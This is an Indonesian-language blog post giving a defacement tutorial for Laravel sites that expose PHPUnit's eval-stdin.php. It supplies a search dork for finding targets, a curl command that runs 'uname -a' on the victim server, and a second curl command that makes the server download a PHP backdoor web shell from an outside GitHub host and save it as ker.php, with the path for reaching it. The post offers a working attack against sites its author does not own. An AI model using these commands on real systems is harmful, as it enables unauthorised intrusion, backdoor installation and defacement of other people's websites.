Deface poc laravel php unit rce(upload shel)

 

hallo guys kembali lg dengan saya,,maaf udh lama gk upload karna sibuk hehe,oke pada artikel kali ini saya akan memberi tutorial deface lg :D

Dork nya:

index of vendor/phpunit

Exploit:

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

disini saya menggunakan curl untuk command di bawah

command untuk melihat server web nya:

curl -v -X GET --data "<?php system('uname -a'); ?>" targetmu.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

command untuk upload shell nya:

curl -v -X GET --data "<?php system('wget -O ker.php https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php');" targetmu.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

untuk shell nya bisa kalian rubah sendiri hehe,,oh iya ciri²web vuln yaitu blank,terdownload dll kalian coba aja :D

oke langkah pertama kita jalan kan command untuk melihat server nya,jika tidak mau kalian bisa langsung upload shell

yap disini kalian lihat web nya menggunakan linux,jika kalian saat mengecek server nya menggunakan command diatas tetapi tidak keluar nama server nya berarti web kalian tidak vuln,oke marikita coba upload shell kita

yap shell berashil terupload,mari kita coba akses

targetmu.com/vendor/phpunit/phpunit/src/Util/PHP/ker.php

kenapa nama shell nya ker?ya karna kita tadi di command nya kasih nama shell nya ker.php

cukup sekian dari saya see you